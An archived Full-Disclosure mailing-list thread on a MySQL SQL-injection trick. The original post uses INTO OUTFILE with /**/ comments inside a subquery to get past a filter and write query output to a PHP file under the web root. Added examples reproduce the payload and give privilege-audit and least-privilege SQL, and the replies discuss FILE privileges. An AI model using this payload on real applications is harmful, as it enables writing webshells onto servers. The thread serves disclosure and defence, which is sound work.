
Mailing List Archive: Full Disclosure: Full-Disclosure

MySQL trick for SQL injection



vladimir.vorontsov at onsec

Nov 6, 2009, 4:55 AM

Post #1 of 5
MySQL trick for SQL injection

Good day!

I recently encountered a problem while carrying out an SQL injection.

I wanted to write a file containing interpreter code to execute commands, but
a bracket was always appended at the end, which I thought would spoil it.

Comments at the end of the query were filtered. A closing parenthesis was
always appended as the last character. Using a null byte was impossible, too.

The injection was of this type:

$query = "select bla-bla from content_comments where user_id in (select
user_id from User where id =".removeBadChars($_GET['id']).");";
where removeBadChars() kills such things as:
--
/*
but leaves /**/
I wanted to write a script to execute commands into a file. The rows were
included in the first select, but the bracket before the include required
it to be closed after it. Besides, the tricky function did not allow ending
the query with a comment of the form -- or /*.

As a result, I was very surprised, because this variant:

select bla-bla from content_comments where user_id in (select user_id from
User where id = 1/**/into/**/outfile/**/"/var/www/avatars/img.php")

wrote the result of the OUTER select to the file!

Checked on:
MySQL 4.1.22
MySQL 5.1.x

--
-----------------------------------------------------------------
Best regards!
Vladimir Vorontsov, security expert.
ONsec: turn on security

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

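The query and payload from the post above, rearranged into a runnable MySQL script so the behaviour can be reproduced. This is an added example, not code from Vladimir's post. The table layout, the body column (the post writes "bla-bla") and the /tmp target path are assumptions; the account running it needs the FILE privilege, and secure_file_priv must allow writing to that directory.

```sql
-- Added reproduction, not code from the original post. Column names other
-- than content_comments / User / user_id / id are assumed. Run as a MySQL
-- account that holds FILE, with secure_file_priv unset or pointing at /tmp.
-- The post reports the behaviour on MySQL 4.1.22 and 5.1.x.

CREATE TABLE User (id INT PRIMARY KEY, user_id INT NOT NULL);
CREATE TABLE content_comments (user_id INT NOT NULL, body VARCHAR(255));

INSERT INTO User VALUES (1, 10), (2, 20);
INSERT INTO content_comments
  VALUES (10, 'first comment'), (10, 'second comment'), (20, 'other user');

-- 1. The application's query with a benign id=1: returns two rows.
SELECT body FROM content_comments
 WHERE user_id IN (SELECT user_id FROM User WHERE id = 1);

-- 2. The usual payload, and why it fails against this filter:
--      id = 1) INTO OUTFILE '/tmp/x' --
--    removeBadChars() strips the "--", so the ")" the application appends
--    is left dangling:
--      ... WHERE id = 1) INTO OUTFILE '/tmp/x' );   <- syntax error

-- 3. The trick from the post: leave INTO OUTFILE inside the subquery, use
--    /**/ (which the filter keeps) as whitespace, and let the application's
--    own ")" close the subquery.  Sent value:
--      id = 1/**/into/**/outfile/**/"/tmp/img.txt"
SELECT body FROM content_comments
 WHERE user_id IN (SELECT user_id FROM User
                    WHERE id = 1/**/into/**/outfile/**/"/tmp/img.txt");

-- Observed result (per the post): the client gets no rows back and
-- /tmp/img.txt now holds the OUTER result set, i.e. the two comment rows.
-- Practical limits: INTO OUTFILE refuses to overwrite an existing file, and
-- the file is written by mysqld, so the database server process (not the
-- web server) must be able to write to the target directory. The file
-- contents are the outer query's rows, so an attacker controls the written
-- bytes only to the extent he controls those rows.
```

Reproduce on a server close to the versions the post lists: the manual for later releases states that INTO should not be used in a nested SELECT, and newer servers may refuse it. Note also what the fix is not: a stricter removeBadChars(). The value is compared with an integer column, so casting it with (int) or binding it as a query parameter removes the injection regardless of which comment forms the filter happens to strip.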

pschmehl_lists at tx

Nov 6, 2009, 8:04 AM

Post #2 of 5
Re: MySQL trick for SQL injection

--On Friday, November 06, 2009 06:55:22 -0600 Vladimir Vorontsov
<vladimir.vorontsov[at]onsec.ru> wrote:

>
> Good day!
>
> I recently encountered a problem while carrying out an SQL injection.
>
> I wanted to write a file containing interpreter code to execute commands, but
> a bracket was always appended at the end, which I thought would spoil it.
>
> Comments at the end of the query were filtered. A closing parenthesis was
> always appended as the last character. Using a null byte was impossible, too.
>
> The injection was of this type:
>
> $query = "select bla-bla from content_comments where user_id in (select
> user_id from User where id =".removeBadChars($_GET['id']).");";
> where removeBadChars() kills such things as:
> --
> /*
> but leaves /**/
> I wanted to write a script to execute commands into a file. The rows were
> included in the first select, but the bracket before the include required
> it to be closed after it. Besides, the tricky function did not allow ending
> the query with a comment of the form -- or /*.
>
> As a result, I was very surprised, because this variant:
>
> select bla-bla from content_comments where user_id in (select user_id from
> User where id = 1/**/into/**/outfile/**/"/var/www/avatars/img.php")
>
> wrote the result of the OUTER select to the file!
>
> Checked on:
> MySQL 4.1.22
> MySQL 5.1.x
>

What privileges did the user who performed the select have?

INTO OUTFILE is a dangerous routine (as you've clearly demonstrated), but that
privilege must be specifically granted to a user before it's possible to
execute it. No sensible administrator would grant the FILE privilege to a
webserver application's database account. (Usually SELECT, INSERT, and UPDATE
should be enough.)

OTOH, if you've found a way to execute FILE without having that privilege
granted to the account, you've uncovered a serious problem.

--
Paul Schmehl, Senior Infosec Analyst
As if it wasn't already obvious, my opinions
are my own and not those of my employer.
*******************************************
"It is as useless to argue with those who have
renounced the use of reason as to administer
medication to the dead." Thomas Jefferson



Valdis.Kletnieks at vt

Nov 6, 2009, 8:37 AM

Post #3 of 5
Re: MySQL trick for SQL injection

On Fri, 06 Nov 2009 10:04:54 CST, Paul Schmehl said:
> What privileges did the user who performed the select have?
>
> INTO OUTFILE is a dangerous routine (as you've clearly demonstrated), but that
> privilege must be specifically granted to a user before it's possible to
> execute it. No sensible administrator would grant the FILE privilege to a
> webserver application's database account.

Very true, but a good blackhat always keeps a good supply of ways to exploit
common stupid administrator mistakes. I'd not be surprised in the least if,
on more than 10% of sites, some admin under time pressure to Just Fix It
assigned FILE privs to get the web application back up and running.


tim-security at sentinelchicken

Nov 6, 2009, 8:55 AM

Post #4 of 5
Re: MySQL trick for SQL injection

> > INTO OUTFILE is a dangerous routine (as you've clearly demonstrated), but that
> > privilege must be specifically granted to a user before it's possible to
> > execute it. No sensible administrator would grant the FILE privilege to a
> > webserver application's database account.
>
> Very true, but a good blackhat always keeps a good supply of ways to exploit
> common stupid administrator mistakes. I'd not be surprised in the least if,
> on more than 10% of sites, some admin under time pressure to Just Fix It
> assigned FILE privs to get the web application back up and running.


I find it's more common that they just have the application log in as
MySQL root. It's foolish. It happens more frequently than you'd like
to admit. Makes my app pentests easier though. ;-)

tim



pschmehl_lists at tx

Nov 6, 2009, 11:03 AM

Post #5 of 5
Re: MySQL trick for SQL injection

--On Friday, November 06, 2009 10:55:26 -0600 Tim
<tim-security[at]sentinelchicken.org> wrote:

>
>> > INTO OUTFILE is a dangerous routine (as you've clearly demonstrated), but
>> > that privilege must be specifically granted to a user before it's possible
>> > to execute it. No sensible administrator would grant the FILE privilege
>> > to a webserver application's database account.
>>
>> Very true, but a good blackhat always keeps a good supply of ways to exploit
>> common stupid administrator mistakes. I'd not be surprised in the least if,
>> on more than 10% of sites, some admin under time pressure to Just Fix It
>> assigned FILE privs to get the web application back up and running.
>
>
> I find it's more common that they just have the application log in as
> MySQL root. It's foolish. It happens more frequently than you'd like
> to admit. Makes my app pentests easier though. ;-)
>

All true, but then we don't have a program flaw, we have a config flaw. If you
run your web applications with root privileges on the database, you should be
surprised when your app gets exploited.

The question I have for the OP is whether or not he's found a true bug in mysql
or simply exposed one of the millions of ways to exploit stupidity.

--
Paul Schmehl, Senior Infosec Analyst
As if it wasn't already obvious, my opinions
are my own and not those of my employer.
*******************************************
"It is as useless to argue with those who have
renounced the use of reason as to administer
medication to the dead." Thomas Jefferson

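Paul's question (which privileges did the account have?) and Tim's observation (applications logging in as root) both come down to a privilege audit. The following MySQL statements are an added example of that audit and of the least-privilege grant Paul describes; they are not from the thread. The account name 'webapp'@'localhost', the database appdb and the password are assumed placeholders.

```sql
-- Added audit queries, not code from the thread. Run as an administrative
-- account. 'webapp'@'localhost', appdb and the password are assumed names.

-- 1. Who can use INTO OUTFILE at all?  FILE is a global privilege, so it
--    lives in mysql.user, never in a per-database grant.
SELECT user, host FROM mysql.user WHERE File_priv = 'Y';

-- 2. Which accounts are effectively superusers (the "app logs in as root"
--    case Tim describes)?
SELECT user, host FROM mysql.user WHERE Super_priv = 'Y' OR Grant_priv = 'Y';

-- 3. Are there live root sessions?  Any entry whose host is the web tier
--    means the application is connecting as root.
SELECT user, host, db, command FROM information_schema.PROCESSLIST
 WHERE user = 'root';

-- 4. Where the server is willing to write outfiles.  An empty value means
--    anywhere mysqld can write; on newer servers NULL disables INTO OUTFILE
--    and LOAD_FILE() entirely, which is the safest setting for a web backend.
SHOW VARIABLES LIKE 'secure_file_priv';

-- 5. A least-privilege account for the application: database-scoped DML
--    only, as Paul suggests (SELECT, INSERT, UPDATE).  No global privileges
--    are granted, so FILE is never available to it.
CREATE USER 'webapp'@'localhost' IDENTIFIED BY 'replace-with-a-real-secret';
GRANT SELECT, INSERT, UPDATE ON appdb.* TO 'webapp'@'localhost';

-- 6. Verify.  The output must not mention FILE, SUPER, or
--    "ALL PRIVILEGES ON *.*".
SHOW GRANTS FOR 'webapp'@'localhost';
```

Run step 6 again from the application's own connection (SHOW GRANTS FOR CURRENT_USER()) after a deployment; the "Just Fix It" grant Valdis describes is usually added to the live account, not to the one in the provisioning script.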
